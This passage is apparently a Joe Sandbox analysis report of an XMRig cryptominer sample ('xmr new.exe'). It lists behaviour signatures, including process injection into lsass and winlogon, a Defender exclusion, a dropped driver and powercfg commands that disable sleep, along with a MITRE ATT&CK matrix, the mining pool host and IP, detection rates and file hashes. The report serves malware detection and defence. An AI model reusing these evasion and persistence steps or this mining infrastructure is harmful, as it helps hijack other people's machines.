        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,25_2_0000000140001B54
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BC7960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,31_2_000001F385BC7960
        Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Modifies power options to not sleep / hibernate
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\Users\user\Desktop\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		1
        Credential API Hooking        		1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Native API        		11
        Windows Service        		1
        Access Token Manipulation        		1
        Obfuscated Files or Information        		LSASS Memory1
        File and Directory Discovery        		Remote Desktop Protocol1
        Credential API Hooking        		1
        Non-Standard Port        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Service Execution        		Logon Script (Windows)11
        Windows Service        		1
        Install Root Certificate        		Security Account Manager24
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook713
        Process Injection        		1
        DLL Side-Loading        		NTDS331
        Security Software Discovery        		Distributed Component Object ModelInput Capture1
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        File Deletion        		LSA Secrets2
        Process Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
        Rootkit        		Cached Domain Credentials131
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Masquerading        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Modify Registry        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt131
        Virtualization/Sandbox Evasion        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Access Token Manipulation        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd713
        Process Injection        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
        Hidden Files and Directories        		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585416 Sample: xmr new.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 55 miners20002.com 2->55 57 pool.hashvault.pro 2->57 65 Malicious sample detected (through community Yara rule) 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 Yara detected Xmrig cryptocurrency miner 2->69 71 13 other signatures 2->71 8 xmr new.exe 1 2 2->8         started        12 eejhedztifcv.exe 1 2->12         started        signatures3 process4 file5 51 C:\ProgramData\...\eejhedztifcv.exe, PE32+ 8->51 dropped 73 Modifies the context of a thread in another process (thread injection) 8->73 75 Adds a directory exclusion to Windows Defender 8->75 77 Modifies power options to not sleep / hibernate 8->77 14 dialer.exe 1 8->14         started        17 powershell.exe 23 8->17         started        19 cmd.exe 1 8->19         started        28 13 other processes 8->28 53 C:\Windows\Temp\zhgmaxoaawxc.sys, PE32+ 12->53 dropped 79 Multi AV Scanner detection for dropped file 12->79 81 Sample is not signed and drops a device driver 12->81 21 dialer.exe 12->21         started        23 powershell.exe 23 12->23         started        25 dialer.exe 12->25         started        30 11 other processes 12->30 signatures6 process7 dnsIp8 83 Contains functionality to inject code into remote processes 14->83 85 Writes to foreign memory regions 14->85 87 Allocates memory in foreign processes 14->87 89 Contains functionality to compare user and computer (likely to detect sandboxes) 14->89 32 lsass.exe 14->32 injected 35 winlogon.exe 14->35 injected 41 2 other processes 14->41 91 Loading BitLocker PowerShell Module 17->91 37 conhost.exe 17->37         started        43 2 other processes 19->43 93 Injects code into the Windows Explorer (explorer.exe) 21->93 95 Creates a thread in another existing process (thread injection) 21->95 97 Injects a PE file into a foreign processes 21->97 45 3 other processes 21->45 39 conhost.exe 23->39         started        59 pool.hashvault.pro 80.240.16.67, 49708, 8888 AS-CHOOPAUS Germany 25->59 99 Query firmware table information (likely to detect VMs) 25->99 47 13 other processes 28->47 49 11 other processes 30->49 signatures9 101 Detected Stratum mining protocol 59->101 process10 signatures11 61 Installs new ROOT certificates 32->61 63 Writes to foreign memory regions 32->63

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        xmr new.exe74%ReversingLabsWin64.Infostealer.Tinba

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe74%ReversingLabsWin64.Infostealer.Tinba
        C:\Windows\Temp\zhgmaxoaawxc.sys5%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        pool.hashvault.pro
        		80.240.16.67
        		truefalse
          		high
          miners20002.com
          		unknown
          		unknowntrue
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
              		high
              http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2797238562.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535320717.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                		high
                http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000025.00000002.2797238562.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535320717.000002A290A4E000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000025.00000002.2797106117.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535288923.000002A290A2F000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              80.240.16.67
                              		pool.hashvault.proGermany
                              		20473AS-CHOOPAUSfalse

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1585416
                              Start date and time:2025-01-07 16:09:07 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 10m 30s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:63
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:7
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:xmr new.exe
                              Detection:MAL
                              Classification:mal100.spyw.evad.mine.winEXE@90/12@4/1
                              EGA Information:
                              • Successful, ratio: 84.6%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, WmiPrvSE.exe
                              • Excluded IPs from analysis (whitelisted): 40.126.32.133, 40.126.32.134, 40.126.32.140, 40.126.32.74, 20.190.160.22, 40.126.32.138, 40.126.32.136, 20.190.160.17, 172.202.163.200
                              • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, login.live.com, www.tm.lg.prod.aadmsa.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target eejhedztifcv.exe, PID 4752 because it is empty
                              • Execution Graph export aborted for target xmr new.exe, PID 2416 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • VT rate limit hit for: xmr new.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              10:10:04API Interceptor1x Sleep call for process: xmr new.exe modified
                              10:10:06API Interceptor57x Sleep call for process: powershell.exe modified
                              10:10:50API Interceptor425805x Sleep call for process: winlogon.exe modified
                              10:10:51API Interceptor341074x Sleep call for process: lsass.exe modified
                              10:10:52API Interceptor909x Sleep call for process: svchost.exe modified
                              10:10:53API Interceptor407399x Sleep call for process: dwm.exe modified
                              10:10:58API Interceptor1887x Sleep call for process: dialer.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              pool.hashvault.proeth.exeGet hashmaliciousXmrigBrowse
                              • 192.248.189.11
                              ZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
                              • 5.188.137.200
                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                              • 5.188.137.200
                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                              • 37.203.243.102
                              file.exeGet hashmaliciousXmrigBrowse
                              • 5.188.137.200
                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                              • 5.188.137.200
                              file.exeGet hashmaliciousXmrigBrowse
                              • 37.203.243.102
                              file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                              • 37.203.243.102
                              file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                              • 37.203.243.102
                              file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                              • 5.188.137.200

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              AS-CHOOPAUSeth.exeGet hashmaliciousXmrigBrowse
                              • 192.248.189.11
                              cZO.exeGet hashmaliciousUnknownBrowse
                              • 108.61.189.74
                              Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                              • 149.253.168.94
                              momo.arm7.elfGet hashmaliciousMiraiBrowse
                              • 137.220.48.181
                              z0r0.x86.elfGet hashmaliciousMiraiBrowse
                              • 45.32.45.161
                              1.elfGet hashmaliciousUnknownBrowse
                              • 185.103.202.108
                              3.elfGet hashmaliciousUnknownBrowse
                              • 108.61.224.55
                              8n26gvrXUM.exeGet hashmaliciousUnknownBrowse
                              • 144.202.34.112
                              8n26gvrXUM.exeGet hashmaliciousUnknownBrowse
                              • 144.202.34.112
                              Setup.exe.7zGet hashmaliciousUnknownBrowse
                              • 207.246.91.177

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exekx new.exeGet hashmaliciousUnknownBrowse
                                Solara.exeGet hashmaliciousUnknownBrowse
                                  C:\Windows\Temp\zhgmaxoaawxc.syseth.exeGet hashmaliciousXmrigBrowse
                                    file.exeGet hashmaliciousXmrigBrowse
                                      hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
                                        5fr5gthkjdg71.exeGet hashmaliciousQuasar, R77 RootKitBrowse
                                          aAcx14Rjtw.exeGet hashmaliciousXmrigBrowse
                                            SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                              0Ty.png.exeGet hashmaliciousXmrigBrowse
                                                Qhx6a6VLAH.exeGet hashmaliciousXmrigBrowse
                                                  88aext0k.exeGet hashmaliciousXmrigBrowse
                                                    gaozw40v.exeGet hashmaliciousXmrigBrowse

                                                      Created / dropped Files

                                                      C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\xmr new.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):5471744
                                                      Entropy (8bit):6.508687886623363
                                                      Encrypted:false
                                                      SSDEEP:98304:HV6FhnwA7hlMJ3J08U0bG31vxEuYH2vGDx+PqvqKjZ9+OE9GuqBfp:16HLXuC8U0KFvxEf9D1SOZuqh
                                                      MD5:7D6398EBFB82A24748617189BF4AD691
                                                      SHA1:6C96D0E343E1E84BF58670F1249C1694A2012F04
                                                      SHA-256:D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
                                                      SHA-512:9AEB3DA479B23880DE94E0B283A562CE19A79C2B27CB819DDF8E149ECA5673A42C659FFF10EA2EA9036AEDDA6FEF37B97ECBF37236DD22BAF20EBA1E6DDA4B4A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 74%
                                                      Joe Sandbox View:
                                                      • Filename: kx new.exe, Detection: malicious, Browse
                                                      • Filename: Solara.exe, Detection: malicious, Browse
                                                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d..._..f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text............................... ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1628158735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nllluldhz/lL:NllU
                                                      MD5:03744CE5681CB7F5E53A02F19FA22067
                                                      SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                                      SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                                      SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                                      Malicious:false
                                                      Preview:@...e.................................L..............@..........

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wsfxp0t.ysv.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5hnmq0k.cve.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkd1lcwd.bin.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uoysqeaj.agl.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................

                                                      C:\Windows\Temp\__PSScriptPolicyTest_ctadsvif.1ug.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\__PSScriptPolicyTest_f11zarfd.waf.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
